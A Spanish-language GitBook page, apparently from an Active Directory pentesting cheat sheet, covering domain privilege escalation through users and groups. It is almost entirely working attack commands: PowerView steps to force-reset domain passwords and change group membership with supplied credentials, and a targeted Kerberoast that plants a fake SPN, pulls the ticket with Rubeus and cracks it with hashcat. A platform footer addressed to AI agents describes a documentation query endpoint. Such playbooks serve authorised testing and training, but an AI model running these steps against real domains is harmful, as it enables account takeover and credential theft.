> For the complete documentation index, see [llms.txt](https://activedirectory.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://activedirectory.mrw0l05zyn.cl/escalamiento-de-privilegios-de-dominio/usuarios-y-grupos.md). # Usuarios y grupos ## Autenticación de usuario contra el dominio ```powershell $UserPassword = ConvertTo-SecureString "" -AsPlainText -Force $UserCredential = New-Object System.Management.Automation.PSCredential("/", $UserPassword) ``` ## Cambio de contraseña de usuario de dominio Autenticación de usuario contra el dominio. ```powershell $UserPassword = ConvertTo-SecureString "" -AsPlainText -Force $UserCredential = New-Object System.Management.Automation.PSCredential("/", $UserPassword) ``` Importación de módulo PowerView. ```powershell Import-Module .\PowerView.ps1 ``` Cambio de contraseña de usuario de dominio. ```powershell $NewUserPassword = ConvertTo-SecureString "" -AsPlainText -Force Set-DomainUserPassword -Identity "" -AccountPassword $NewUserPassword -Credential $UserCredential -Verbose ``` ## Agregar y eliminar usuario a grupo de dominio Autenticación de usuario contra el dominio. ```powershell $UserPassword = ConvertTo-SecureString "" -AsPlainText -Force $UserCredential = New-Object System.Management.Automation.PSCredential("/", $UserPassword) ``` Importación de módulo PowerView. ```powershell Import-Module .\PowerView.ps1 ``` Agrega usuario a grupo de dominio. ```powershell Add-DomainGroupMember -Identity "" -Members "" -Credential $UserCredential -Verbose ``` Eliminar usuario de un grupo de dominio. ```powershell Remove-DomainGroupMember -Identity "" -Members "" -Credential $UserCredential -Verbose ``` Confirmación de eliminación de usuario de un grupo de dominio. ```powershell Get-DomainGroupMember -Identity "" | Select MemberName |? {$_.MemberName -eq ""} -Verbose ``` ## Creación de Service Principal Names (SPN) falso Autenticación de usuario contra el dominio. ```powershell $UserPassword = ConvertTo-SecureString "" -AsPlainText -Force $UserCredential = New-Object System.Management.Automation.PSCredential("/", $UserPassword) ``` Creación de Service Principal Names (SPN) falso. ```powershell Set-DomainObject -Credential $UserCredential -Identity "" -SET @{serviceprincipalname='SPN/fake'} -Verbose ``` Obtener Ticket Granting Service (TGS). ```shell .\Rubeus.exe kerberoast /user: /nowrap ``` Cracking de Ticket Granting Service (TGS). ```shell # RC4 / $krb5tgs$23$ hashcat -m 13100 tgs.txt # AES-128 / $krb5tgs$17$ hashcat -m 19600 tgs.txt # AES-256 / $krb5tgs$18$ hashcat -m 19700 tgs.txt ``` Eliminación de Service Principal Names (SPN) falso. ```powershell Set-DomainObject -Credential $UserCredential -Identity "" -Clear serviceprincipalname -Verbose ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://activedirectory.mrw0l05zyn.cl/escalamiento-de-privilegios-de-dominio/usuarios-y-grupos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.